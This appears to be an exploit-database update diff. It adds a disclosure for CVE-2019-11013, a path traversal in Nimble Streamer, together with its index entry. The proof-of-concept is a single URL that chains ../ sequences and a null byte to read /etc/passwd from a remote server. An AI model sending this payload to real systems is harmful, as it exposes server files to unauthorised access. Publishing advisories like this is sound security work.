DB: 2019-08-24

1 changes to exploits/shellcodes

Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal

exploits/multiple/webapps/47301.txt

@@ -0,0 +1,15 @@
+# Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
+# Exploit Author: MAYASEVEN
+# Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/"
+# Published on 08/04/2019
+# Vendor Homepage at "https://wmspanel.com/nimble"
+# Affected Version 3.0.2-2 to 3.5.4-9
+# Tested on 3.5.4-9
+# CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal
+# Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability.
+#              Successful exploitation could allow an attacker to traverse the file system to access
+#              files or directories that are outside of the restricted directory on the remote server.
+
+
+POC :
+ - http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448

files_exploits.csv

@@ -41657,3 +41657,4 @@ id,file,description,date,author,type,platform,port
 47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux,
 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
 47295,exploits/php/webapps/47295.html,"WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php,
+47301,exploits/multiple/webapps/47301.txt,"Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal",2019-08-23,MaYaSeVeN,webapps,multiple,